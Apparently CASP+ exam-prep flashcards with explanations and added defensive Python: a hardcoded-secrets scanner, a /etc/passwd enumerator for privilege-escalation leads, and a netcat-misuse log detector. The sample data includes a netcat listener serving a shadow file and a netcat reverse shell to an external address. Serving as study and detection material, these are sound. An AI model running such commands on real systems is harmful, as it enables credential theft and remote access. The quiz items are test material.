CASP Mark B Mock 1 Flashcards

1
Q

Developers are building sensitive references and account details into the application code. Security engineers need to ensure that the organization can secure the continuous integration/continuous delivery (CI/CD) pipeline. What would be the best choice?

A. Perform dynamic application security testing
B. Use a centralized trusted secrets manager service
C. Use interactive application security testing
D. Ensure the developers are using version control

A

B. Use a centralized trusted secrets manager service

Explanation:
Use a centralized trusted secrets manager service. Secrets include user-generated and auto-generated passwords, API keys and other application credentials, SSH keys, database and other system-to-system passwords, private certificates used for authenticated communication, and private encryption keys. Keeping them in a secrets manager keeps them out of source code and version history, and lets the pipeline inject them at build or run time instead.
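The secrets-in-code problem above is usually caught with a scanner run in the pipeline (pre-commit or a CI stage) before a secrets manager replaces the literals. The following is an added example, not code from the flashcards or the cited book: a minimal scanner that flags string literals assigned to credential-named variables or with high entropy, and the replacement pattern in which the secret is supplied at run time by the pipeline's secret store. The sample source text, variable names and the `load_secret` helper are constructed for this example.

```python
import math
import os
import re

# Constructed sample source file (made up for this example, not from any real project).
SAMPLE_SOURCE = """\
DB_HOST = "db.internal.example"
DB_PASSWORD = "Sup3r-S3cret-Pa55!"
api_key = 'ak_live_7f3c9b2e1d4a8f6b0c5e2d9a'
conn_string = "xK9#pQ2$vL7mN4bR8tY1wZ6c"
token = os.environ["API_TOKEN"]
secret = secrets_client.get_secret("prod/db/password")
timeout = "30"
"""

# Variable names that usually hold credentials.
SECRET_NAME = re.compile(r"(password|passwd|pwd|secret|token|api[_-]?key|private[_-]?key)", re.I)
# An assignment whose right-hand side is a plain quoted string literal.
LITERAL_ASSIGNMENT = re.compile(
    r"""^\s*(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*[:=]\s*(?P<q>["'])(?P<value>[^"']*)(?P=q)\s*$"""
)


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; random keys score well above words and host names."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((text.count(c) / n) * math.log2(text.count(c) / n) for c in set(text))


def find_hardcoded_secrets(source: str, min_len: int = 8, entropy_threshold: float = 3.5):
    """Return (line number, variable, reason) for every literal that looks like a secret."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = LITERAL_ASSIGNMENT.match(line)
        if not m:
            # Environment lookups and secret-manager calls are not literals: they pass.
            continue
        name, value = m.group("name"), m.group("value")
        if SECRET_NAME.search(name) and len(value) >= min_len:
            findings.append((lineno, name, "credential-named variable assigned a string literal"))
        elif len(value) >= 20 and shannon_entropy(value) >= entropy_threshold:
            findings.append((lineno, name, "high-entropy string literal"))
    return findings


def load_secret(name: str) -> str:
    """Replacement pattern (hypothetical helper): the secret is injected at run time by the
    pipeline's secret store, here as an environment variable, and never sits in the repository."""
    value = os.environ.get(name)
    if value is None:
        raise RuntimeError(f"secret {name!r} was not provided by the secret manager")
    return value


if __name__ == "__main__":
    for lineno, name, reason in find_hardcoded_secrets(SAMPLE_SOURCE):
        print(f"line {lineno}: {name}: {reason}")
```

Lines 2, 3 and 4 of the sample are reported; the `os.environ` and `get_secret` lines pass because they contain no literal, which is exactly the shape the code should have after the secrets manager is introduced. Real scanners add vendor-specific key formats and an allow-list for test fixtures, but the two rules above catch most accidental commits.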

2
Q

What type of assessment should be performed by an organization that stores, transmits or processes data that contains private information?

A. Business Impact Assessment
B. Privacy Impact Assessment
C. Risk Assessment
D. Safety Assessment

A

B. Privacy Impact Assessment

Explanation:
Privacy Impact Assessment. A PIA should be undertaken by any organization that stores, transmits or processes data that contains private information. Data types will vary but can include documents, database records and media such as CCTV footage and voice recordings

3
Q

The ACME corporation has recently run an annual risk assessment as part of its regulatory compliance. The risk management team has identified a high level risk that could lead to fraudulent activities. The team has recommended that certain privileged tasks must be performed by more than one person for the task to be validated. What is this an example of?

A. Job rotation
B. Least privilege
C. Separation of duties
D. MFA

A

C. Separation of duties

Explanation:
Separation of duties. When an employee has privileges that enable them to make high-level decisions without needing the consent of another employee, then we are missing essential checks and balances. Consider a Chief Financial Officer (CFO), who approves new suppliers, approves the suppliers’ invoices for services, and signs their paychecks. This example would allow for fraudulent activities and would be mitigated by establishing accounts receivable and accounts payable business functions. See Chapter 13, Applying Appropriate Risk Strategies.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 820). Packt Publishing. Kindle Edition.

5
Q

An e-commerce site has recently upgraded its web application servers to use TLS 1.3, though some customers are calling the service desk as they can no longer access the services. After analyzing the logs that had been generated on the client’s devices, the following was observed: ERROR_SSL_VERSION_OR_CIPHER_MISMATCH

What is the most likely cause of the reported error?

A. Clients are configured to use ECDHE.
B. Clients are configured to use RC4.
C. Clients are configured to use PFS.
D. Clients are configured to use AES-256 GCM.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 798-799). Packt Publishing. Kindle Edition.

A

B. Clients are configured to use RC4.

Explanation:
Clients are configured to use RC4. RC4 is a broken stream cipher and is not among the cipher suites permitted by TLS 1.3, which only allows AEAD suites (AES-GCM, AES-CCM and ChaCha20-Poly1305). A client that offers only RC4 suites has nothing in common with the server, so the handshake fails and the browser reports a version/cipher mismatch. ECDHE, perfect forward secrecy and AES-256-GCM are all supported by TLS 1.3 (ephemeral key exchange is mandatory in it), so they would not cause the error.

6
Q

The security professionals are reviewing all the servers in the company and discover that a server is missing crucial patches that would mitigate a recent exploit that could gain root access. Which of the following describes the teams’ discovery?

A. A vulnerability
B. A threat
C. A breach
D. A risk

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 799). Packt Publishing. Kindle Edition.

A

A. A vulnerability

Explanation:
A vulnerability. When a system is missing patches, it is vulnerable to attacks. During a risk assessment, we need to assess vulnerabilities and potential threats that could target the vulnerability. See Chapter 6, Vulnerability Assessment and Penetration Testing Methods and Tools.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 820-821). Packt Publishing. Kindle Edition.

7
Q

ACME bank has a compliance requirement. They require a third-party penetration test of the customer-facing banking application to be conducted annually. What type of penetration testing would ensure the lowest resource usage?

A. Black-box testing
B. Gray-box testing
C. Red-team exercises
D. White-box testing

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 799). Packt Publishing. Kindle Edition.

A

A. Black-box testing

Explanation:
Black-box testing. The tester is given no internal information, so the engagement takes the least preparation and the fewest organizational resources, but it may not discover all vulnerabilities because the tester cannot see the application's internals.

8
Q

Recently, the ACME corporation has merged with a similar sized organization. The SOC Staff now have an increased workload and are failing to respond to all alerts. What is likely the cause of this behavior?

A. False positive
B. Alert fatigue
C. False negative
D. True positive

A

B. Alert fatigue

Explanation:
Alert fatigue. This is when the staff are overwhelmed with too many alerts.

9
Q

A small regional bank, with no dedicated security staff, must deploy security at the edge of the network. They will need a solution that offers protection from multiple threats that may target the bank's network. What would be the best solution for this?

A. Router
B. WAF
C. UTM
D. DLP

A

C. UTM

Explanation:
Unified Threat Management combines multiple security functions into a single appliance

10
Q

During baseline security training for new developers, attention must be focused on the use of third party libraries. What is the important aspect for a commercial development team that’s considering the use of third party libraries?

A. Third party libraries may have vulnerabilities.
B. Third party libraries may be incompatible
C. Third party libraries may not support DNSSEC
D. Third party libraries may have licensing restrictions

A

A. Third party libraries may have vulnerabilities.
D. Third party libraries may have licensing restrictions

Explanation:
Third-party libraries may have vulnerabilities and may have licensing restrictions. Both matter to a commercial team: a vulnerable dependency is inherited by the product, and a restrictive license can limit how the product may be distributed or sold.

11
Q

A CISO wants to change the culture of the organization to strengthen the company's security posture. The initiative will bring the development and operations teams together when code is released to the production environment. What is the best description of this initiative?

A. DevOps
B. A team building exercise
C. A tabletop exercise
D. SecDevOps

A

D. SecDevOps

Explanation:
SecDevOps (also written DevSecOps) extends DevOps, in which the development and operations teams work together to release code, by making security a shared responsibility throughout the pipeline rather than a check at the end. Because the stated goal is to strengthen the security posture, this describes the initiative better than plain DevOps.

12
Q

A development team is working with a customer to develop a mobile application. The customer has already defined all the requirements upfront and wants the application to be developed using very strict timelines. It is not anticipated that any changes will be made to the initial definition. What software development approach would be the most suitable for this engagement?

A. Agile
B. Waterfall
C. Spiral
D. Build and Fix

A

B. Waterfall

Explanation: The waterfall methodology means that we must have defined all the requirements at the start of the process and that no changes will be made during the development cycle

13
Q

A CISO for a large multinational bank would like to address security concerns regarding the use and auditing of local administrator credentials on end devices. Currently, users are given local administrator privileges when access is required. This current practice has resulted in undocumented changes, a lack of accountability, and account lockouts. What could be implemented to address these issues?

A. Use Privileged Access Management (PAM) to maintain user accounts in the local admin group.
B. Deploy EDR to remove users from local admins group and enable audit logs.
C. Use Privileged Access Management (PAM) to remove user accounts from the local admin group and prompt the user for explicit approval when elevation is required.
D. Deploy EDR to remove users from the local admins group and enable UEBA.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 801-802). Packt Publishing. Kindle Edition.

A

C. Use Privileged Access Management (PAM) to remove user accounts from the local admin group and prompt the user for explicit approval when elevation is required.

Explanation:
Use Privileged Access Management (PAM) to remove user accounts from the local admin group and prompt the user for explicit approval when elevation is required. This removes standing local administrator rights, allows accounts to elevate on demand with explicit approval, and records each elevation, so changes become documented and accountable.

14
Q

The ACME corporation has been suffering from increasing numbers of service outages on the endpoints due to ever-increasing instances of new malware. The Chief Financial Officer’s laptop was impacted while working remotely from a hotel. The objective is to prevent further instances of endpoint disruption. Currently, the company has deployed a web proxy at the edge of the network. What should the company deploy to mitigate these threats?

A. Replace the current antivirus with an EDR solution.
B. Remove the web proxy and install a UTM appliance.
C. Implement application blacklisting on the endpoints.
D. Add a firewall module to the current antivirus solution.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 802). Packt Publishing. Kindle Edition.

A

A. Replace the current antivirus with an EDR solution.

Explanation:
Replace the current antivirus with an EDR solution. The end devices must be protected when they are not on the company network. The other solutions will not adequately fulfill the requirements

15
Q

A company has been testing its Disaster Recovery Plan (DRP) while team members have been assessing challenges that had been encountered while testing in parallel. Computing resources ran out at 65% of the restoration process for critical services. What documentation should be modified to address this issue?

A. Recovery point objective
B. Business Impact Assessment
C. Mission-essential functions
D. Recovery service level

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 802-803). Packt Publishing. Kindle Edition.

A

D. Recovery service level

Explanation:
Recovery service level. The RSL documents the level of service, and therefore the computing resources, that must be restored for critical services during recovery. Running out of resources at 65% of the restoration shows that the documented level is wrong and must be revised; the RPO concerns data loss, and the BIA and mission-essential functions define what is critical rather than how much capacity recovery needs.

16
Q

A security professional is performing a system penetration test. They successfully gain access to a shell on a Linux host as a standard user and want to elevate their privilege levels. What would be the most effective way to perform privilege escalation?

A. Spawn a shell using sudo and use a text editor to update the sudoer’s file.
B. Perform ASIC password cracking on the host.
C. Access the /etc/passwd file to extract the usernames.
D. Use the UNION operator to extract the database schema.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 803). Packt Publishing. Kindle Edition.

A

C. Access the /etc/passwd file to extract the usernames.

Explanation:
Access the /etc/passwd file to extract the usernames. A standard user cannot edit /etc/sudoers (and cannot spawn a root shell via sudo without already holding sudo rights), ASIC password cracking is not something performed on the target host, and UNION is a SQL injection technique, so enumerating local accounts from the world-readable /etc/passwd file is the option that advances privilege escalation. Note that on modern Linux the password hashes are kept in /etc/shadow, readable only by root; /etc/passwd yields usernames, UIDs, home directories and login shells.
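What a tester actually does with /etc/passwd is enumerate it for escalation leads: extra UID-0 accounts, accounts whose hash was left in the world-readable file instead of /etc/shadow, empty password fields, and which accounts have an interactive shell. The following is an added example, not code from the flashcards or the cited book; the passwd content is constructed for the example and the account names are made up.

```python
# Constructed /etc/passwd content (made up for this example; the hash is not real).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
backup-svc:x:0:0:backup service:/var/backups:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
legacy:$6$c0nstructed$notarealhashvalue:1001:1001::/home/legacy:/bin/bash
guest::1002:1002::/home/guest:/bin/sh
"""

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false", ""}


def enumerate_passwd(passwd_text: str):
    """Parse passwd(5) lines and return the findings a tester cares about."""
    findings = {"uid0": [], "inline_hashes": [], "empty_password": [], "interactive": []}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry; a full tool would report it rather than skip it
        name, pw, uid, gid, gecos, home, shell = fields
        if uid == "0" and name != "root":
            # Any extra UID-0 account is an alternative route to root.
            findings["uid0"].append(name)
        if pw == "":
            # Empty password field: the account may log in with no password at all.
            findings["empty_password"].append(name)
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # "x" means the hash lives in /etc/shadow; anything else is a hash exposed
            # to every local user and can be cracked offline.
            findings["inline_hashes"].append(name)
        if shell not in NOLOGIN_SHELLS:
            findings["interactive"].append(name)
    return findings


if __name__ == "__main__":
    for category, names in enumerate_passwd(SAMPLE_PASSWD).items():
        print(f"{category}: {', '.join(names) or '-'}")
```

On a real host the same parser is pointed at the file itself; the interactive-account list is then the set of targets for checking sudo rights (`sudo -l`), SSH keys in home directories and reused passwords.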

18
Q

A CISO needs to ensure there is an effective incident response plan. As part of the plan, a CSIRT team needs to be identified, including leadership with a clear reporting and escalation process. At what part of the incident response process should this be done?

A. Preparation
B. Detection
C. Analysis
D. Containment

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 804). Packt Publishing. Kindle Edition.

A

A. Preparation

Explanation:
Preparation. Establishing the CSIRT, its leadership and its reporting and escalation paths must be done before any incident occurs, which is the preparation phase of the incident response process.

19
Q

The ACME corporation’s CSIRT team responded to an incident where several routers failed at the same time. The cause of the failure is unknown, and the routers have been reconfigured and restored to operational condition. The integrity of the router’s configuration has also been verified. Which of the following should the team perform to understand the failure and prevent it in the future?

A. Root cause analysis
B. Continuity of operations plan
C. After-action report
D. Lessons learned

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 804-805). Packt Publishing. Kindle Edition.

A

A. Root cause analysis

Explanation:
Root cause analysis. The routers are already restored, so the remaining task is to determine why they failed; root cause analysis establishes that, and its findings then feed the lessons learned session and the after-action report.

20
Q

Jeff, a developer with the ACME corporation, is concerned about the impact of new malware on an ARM CPU. He knows that the malware can insert itself in another process memory location. Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?

A. Execute-never (XN)
B. EDR software
C. Total memory encryption
D. Virtual memory encryption

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 805). Packt Publishing. Kindle Edition.

A

A. Execute-never (XN)

Explanation:
Execute-never (XN). The XN bit in the ARM memory management unit marks memory pages as non-executable, the ARM equivalent of the NX bit and DEP on x86. Code that malware writes into a data page (stack or heap) of another process cannot be executed, so the protection is enforced by the CPU hardware rather than by software.

21
Q

Security professionals have detected anomalous activity on the edge network. To investigate the activity further, they intend to examine the contents of the pcap file. They are looking for evidence of data exfiltration from a suspect host computer. To minimize disruption, they need to identify a command-line tool that will provide this functionality. What should they use?

A. netcat
B. tcpdump
C. Aircrack-ng
D. Wireshark

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 805-806). Packt Publishing. Kindle Edition.

A

B. tcpdump

Explanation:
tcpdump is a command-line protocol analyzer that captures traffic and can also read and filter previously saved captures (tcpdump -r file.pcap). pcap is a standard packet capture file format. Wireshark offers the same analysis through a graphical interface, which the question rules out; netcat is a networking utility and Aircrack-ng is a wireless auditing tool.

22
Q

Ann, a security analyst, is investigating anomalous activity within syslog files. She is looking for evidence of unusual activity based on reports from User Entity Behavior Analytics (UEBA). Several events may be indicators of compromise. Which of the following requires further investigation?

A. Netstat -bn
B. vmstat -a 5
C. nc -w 180 -p 12345 -l < shadow.txt
D. Exiftool companylogo.jpg

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 806). Packt Publishing. Kindle Edition.

A

C. nc -w 180 -p 12345 -l < shadow.txt

Explanation:
nc -w 180 -p 12345 -l < shadow.txt. This starts a netcat listener on TCP port 12345 (with a 180-second timeout) and feeds it shadow.txt on standard input, so whoever connects receives what appears to be a copy of the password hash file: staged data exfiltration. Netcat can equally be used to push files out or run remote commands. The other commands (socket listing, memory statistics, image metadata) are routine.
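The triage Ann is doing can be automated: parse the command field out of each process-execution log line and apply rules for netcat misuse (listener opened, a file redirected into it, a program executed, a connection outside the organization's ranges). The following is an added example, not code from the flashcards or the cited book. The log layout, the `procmon:` tag, the internal address ranges and the host names are constructed for the example.

```python
import ipaddress
import re
import shlex

# Constructed process-execution log lines in a syslog-like layout (made up for this example).
SAMPLE_LOG = """\
Mar 12 10:01:22 host1 procmon: uid=1001 cmd="netstat -bn"
Mar 12 10:02:05 host1 procmon: uid=1001 cmd="vmstat -a 5"
Mar 12 10:04:41 host1 procmon: uid=1001 cmd="nc -w 180 -p 12345 -l < shadow.txt"
Mar 12 10:05:10 host1 procmon: uid=1001 cmd="exiftool companylogo.jpg"
Mar 12 10:07:30 host1 procmon: uid=1001 cmd="nc 203.0.113.5 4444 -e /bin/sh"
Mar 12 10:09:00 host1 procmon: uid=1001 cmd="nc -zv 10.0.0.12 22"
"""

CMD_FIELD = re.compile(r'cmd="(?P<cmd>[^"]*)"')
NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SENSITIVE_HINTS = ("shadow", "passwd", "id_rsa", "id_ed25519", ".pem", ".kdbx")
# Assumed internal ranges for this example; a real deployment uses the organization's own.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def analyse_command(cmd: str):
    """Return the reasons this command line looks like netcat misuse (empty if benign)."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return ["unparseable command line"]
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_BINARIES:
        return []
    # Expand combined short flags such as "-lvp" into single letters.
    flags = set()
    for tok in argv[1:]:
        if re.fullmatch(r"-[A-Za-z]+", tok):
            flags.update(tok[1:])
    reasons = []
    if "l" in flags or "--listen" in argv:
        reasons.append("netcat listener opened")
    if "<" in argv:
        i = argv.index("<")
        src = argv[i + 1] if i + 1 < len(argv) else ""
        reasons.append(f"stdin redirected from file {src!r}: served to whoever connects")
        if any(h in src.lower() for h in SENSITIVE_HINTS):
            reasons.append("redirected file looks like credential material")
    if "e" in flags or "c" in flags:
        reasons.append("netcat executing a program: bind/reverse shell")
    for tok in argv[1:]:
        try:
            addr = ipaddress.ip_address(tok)
        except ValueError:
            continue
        if not any(addr in net for net in INTERNAL_NETS):
            reasons.append(f"connection to address outside internal ranges: {addr}")
    return reasons


def triage(log: str):
    """Return (line number, command, reasons) for every log line that needs investigation."""
    hits = []
    for lineno, line in enumerate(log.splitlines(), 1):
        m = CMD_FIELD.search(line)
        if not m:
            continue
        reasons = analyse_command(m.group("cmd"))
        if reasons:
            hits.append((lineno, m.group("cmd"), reasons))
    return hits


if __name__ == "__main__":
    for lineno, cmd, reasons in triage(SAMPLE_LOG):
        print(f"line {lineno}: {cmd}\n  " + "\n  ".join(reasons))
```

Line 3 (the card's answer) and line 5 (a reverse shell to an external host) are reported; line 6 is a netcat connection too, but to an internal host with no listener, redirect or exec, so the rules leave it alone. A production detection would also correlate with the UEBA alert that triggered the review.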

23
Q

UEBA has generated alerts relating to significant amounts of PNG image uploads to a social networking site. The account that has generated the reports is a recent hire in the Research and Development division. A rival manufacturer is selling products that appear to be based on the company’s sensitive designs. The payloads are now being analyzed by forensics investigators. What tool will allow them to search for evidence in the PNG files?

A. Steganalysis tool
B. Cryptanalysis tool
C. Binary analysis tool
D. Memory analysis tool

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 806). Packt Publishing. Kindle Edition.

A

A. Steganalysis tool

Explanation:
A steganalysis tool searches for data hidden within graphics files; sensitive designs could be embedded in otherwise innocuous PNG uploads to evade DLP.

24
Q

Marketing executives are attending an international trade exhibition and must connect to their company’s email using their mobile devices during the event. The CISO is concerned that this may present a risk. What would best mitigate this risk?

A. Near-field communication (NFC)
B. Split-tunnel
C. VPN Geofencing
D. Always-on VPN settings

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 807). Packt Publishing. Kindle Edition.

A

D. Always-on VPN settings

Explanation:
With an always-on VPN, all traffic from the device is carried over an encrypted tunnel that is routed through the company network, so hostile exhibition or hotel Wi-Fi cannot intercept or redirect the e-mail connection, and the user cannot forget to connect.

25
Q

A company employee has followed a QR code link and installed a mobile application that's used to book and schedule activities at a vacation resort. The application is not available on the Google Play Store. Company policy states that applications can only be downloaded from the official vendor store or company portal. What best describes what has allowed this app to be installed?

A. Supply chain issues
B. Side loading
C. Containerization
D. Unauthorized application stores

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 807). Packt Publishing. Kindle Edition.

A

D. Unauthorized application stores

Explanation:
Unauthorized application stores. The app was obtained from a source other than the official vendor store or company portal, which is exactly what the policy forbids.

26
Q

A company has deployed a hardened Linux image to mobile devices. The restrictions are as follows: All unnecessary services must be removed. Only company-deployed apps can be run. The runtime code is protected against memory exploits. The CISO is concerned that an attacker may be able to launch attacks using common utilities and command-line tools. What could be deployed to mitigate the CISO’s concerns?

A. Whitelisting
B. Shell restrictions
C. ASLR
D. Memory encryption

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 807-808). Packt Publishing. Kindle Edition.

A

B. Shell restrictions

Explanation:
The current settings mitigate the main threats but do not prevent built-in commands and shell utilities from being run; a restricted shell limits which commands an attacker who gains a foothold can execute.

27
Q

A regional Internet Service Provider (ISP) is experiencing outages and poor service levels over some of its copper-based infrastructure. These faults are due to the reliance on legacy hardware and software. Several times during the month, a contracted company must follow a checklist of 12 different commands that must be run in serial to restore performance to an acceptable level. The ISP would like to make this an automated process. Which of the following techniques would be best suited for this requirement?

A. Deploy SOAR utilities and runbooks.
B. Replace the associated hardware.
C. Provide the contractors with direct access to syslog data.
D. Switch the copper-based infrastructure to fiber.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 808). Packt Publishing. Kindle Edition.

A

A. Deploy SOAR utilities and runbooks.

Explanation:
Deploy SOAR utilities and runbooks. This will automate this repetitive process and take some of the workload off the technicians

28
Q

A security analyst is investigating a possible buffer overflow attack. The attack seems to be attempting to load a program file. Analysis of the live memory reveals that the following string is being run: code.linux_access.prg Which of the following technologies would best mitigate the manipulation of memory segments?

A. NX bit
B. ASLR
C. DEP
D. HSM

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 808-809). Packt Publishing. Kindle Edition.

A

B. ASLR

Explanation:
ASLR (Address Space Layout Randomization) is built into the operating system and randomizes the base addresses of the stack, heap and shared libraries on each execution, so an attacker cannot reliably predict where the memory segments they are trying to manipulate will be. The NX bit and DEP (hardware and OS enforcement of non-executable pages) block execution of injected code but do not stop an attacker from targeting known addresses, which is why ASLR is the best fit for this question; an HSM protects keys, not memory.

29
Q

A CISO at a regional power supply company is performing a risk assessment. The CISO must consider what the most important security objective is when applying cryptography to control messages. The control messages are critical and enable the operational technology to ensure the generators are outputting the correct electrical power levels. What is the most important consideration here?

A. Importing the availability of messages
B. Ensuring the non-repudiation of messages
C. Enforcing protocol conformance for messages
D. Ensuring the integrity of messages

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 809). Packt Publishing. Kindle Edition.

A

D. Ensuring the integrity of messages

Explanation:
Ensuring the integrity of messages. Control messages will not normally be confidential but must be tamper-proof. This is the best solution

30
Q

Alan, a CISO for an online retailer, is performing a quantitative risk assessment. The assessment is based on the public-facing web application server. Current figures show that the application server experiences 80 attempted breaches per day. In the past 4 years, the company’s data has been breached two times. Which of the following represents the ARO for successful breaches?

A. 50
B. 0.8
C. 0.5
D. 29,200

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 809-810). Packt Publishing. Kindle Edition.

A

C. 0.5

Explanation:
ARO is the expected number of successful events per year: two breaches over 4 years gives 2 / 4 = 0.5. The 80 attempted breaches per day (29,200 per year) are attempts, not successful breaches, and do not enter the ARO.

31
Q

Security engineers are assessing the capabilities and vulnerabilities of a widely used mobile operating system. The company intends to deploy a secure image to mobile phones and tablets. The mobile devices mustn’t be vulnerable to the risk of privilege elevation and the misuse of applications. What would be the most beneficial to the company for addressing these concerns?

A. Security-Enhanced Linux (SELinux)
B. Trusted Platform Module (TPM)
C. Security-Enhanced Android (SEAndroid)
D. Attestation services

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 810). Packt Publishing. Kindle Edition.

A

C. Security-Enhanced Android (SEAndroid)

Explanation:
SEAndroid applies SELinux mandatory access control to Android, confining each app to its own domain so that a compromised or misused app cannot escalate privileges or reach other apps' data.

32
Q

Gerry, a CISO for a national healthcare provider, is assessing proposals for network storage solutions. The proposal is for NAS to be deployed to all regional hospitals and clinics. As the data that will be stored will be sensitive and subject to strict regulatory compliance, security is the most important consideration. The proposal is for appliances running a Linux kernel and providing secure access to authenticated users through NFS. One major concern is ensuring that the root account cannot be used to gain access to user data on the Linux NFS appliances. What would best prevent this issue from occurring?

A. Ensure passwords are stored in a shadow file.
B. Run SELinux in enforced mode.
C. Disable central processing unit (CPU) virtualization support.
D. Enforce secure encrypted enclaves/memory encryption.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 810-811). Packt Publishing. Kindle Edition.

A

B. Run SELinux in enforced mode.

Explanation:
Run SELinux in enforcing mode. This enforces mandatory access control (MAC), whose policy applies to every process including those running as root, so the root account cannot simply override the permissions on users' data.

33
Q

ACME chemicals is conducting a risk assessment for its legacy operational technology. One of their major concerns is the widespread use of a standard message transport protocol that’s used in industrial environments. After performing a vulnerability assessment, several CVEs are discovered with high CVSS values. The findings describe the following vulnerabilities: CVE-2018-11452: Denial-of-service of the affected device CVE-2018-7842: Elevation of privilege by conducting a brute-force attack on the parameters that were sent to the controller CVE-2017-6034: An attacker can replay the run, stop, upload, and download commands Additional CVEs report multiple vulnerabilities, including no security against message integrity being tampered with and being vulnerable to MITM attacks. What is the network/protocol that has most likely been assessed?

A. Ethernet
B. Modbus
C. Distributed Network Protocol 3 (DNP3)
D. Zigbee

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 811-812). Packt Publishing. Kindle Edition.

A

B. Modbus

Explanation:
Modbus is a widely used control protocol in industrial environments. It was designed without authentication, encryption or message integrity checks, so it is vulnerable to replay, man-in-the-middle and brute-force attacks of the kind described.

35
Q

A small water treatment plant is being controlled by a SCADA system. There are four main treatment tanks, each being serviced by an input pump and an output pump. The design of the plant offers redundancy as the plant can operate without all the tanks being available. The plant is comprised of a standard SCADA mix of operational technology, including PLCs and a supervisory computer. What system failure will cause the biggest outage?

A. Loss of a treatment tank
B. Loss of supervisory computer
C. Failure of an input pump
D. Failure of a PLC

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 813). Packt Publishing. Kindle Edition.

A

B. Loss of supervisory computer

Explanation:
Loss of supervisory computer. The plant can lose a tank, a pump or a PLC and keep running on the remaining tanks, but the supervisory computer is the single point that monitors and controls all four tanks, so its loss affects the entire plant.

36
Q

A development team is implementing a customer-facing API that uses a database backend. Before the deployment, the team is concerned about attacks, such as XSS, XSRF, and injection attacks. To mitigate these types of attacks, the team needs to identify security controls that could be implemented. Which of the following sources could the team consult to address these security concerns?

A. SDLC
B. OVAL
C. IEEE
D. OWASP

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 813). Packt Publishing. Kindle Edition.

A

D. OWASP

Explanation:
This will be the best source of reference when securing web applications

37
Q

The customers of a large online retailer are reporting high levels of latency when they are searching for products on the e-commerce site. The site consists of an array of load-balanced APIs that do not require authentication. The application servers that host the APIs are showing heavy CPU utilization. WAFs that have been placed in front of the APIs are not generating any alerts. Which of the following should a security engineer recommend to best remedy these performance issues promptly?

A. Implement rate limiting on the API.
